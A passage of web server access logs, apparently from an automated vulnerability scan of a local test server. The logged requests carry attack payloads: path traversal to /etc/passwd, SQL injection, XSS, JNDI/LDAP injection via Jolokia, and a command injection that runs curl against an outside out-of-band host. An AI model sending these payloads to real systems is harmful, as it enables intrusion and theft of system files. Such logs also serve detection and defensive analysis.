+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.test.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.dev.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"{\x22Password\x22:\x22297MFk0O9znYuX4TNvhQ55yKFBW\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"PATCH", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prtg/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.prod.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"\x22name\x22:\x22';$(curl http://c9v8gc8smpv8b0ng0t00ncainmosx1suk.oast.online);'\x22,\x0D\x0A\x22email\x22:\x22a@b.c\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 +0000","request_body":"{\x22UserName\x22:\x22Administrator\x22,\x22Password\x22:\x22297MFk0O9znYuX4TNvhQ55yKFBW\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /redfish/v1/SessionService/Sessions/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:05 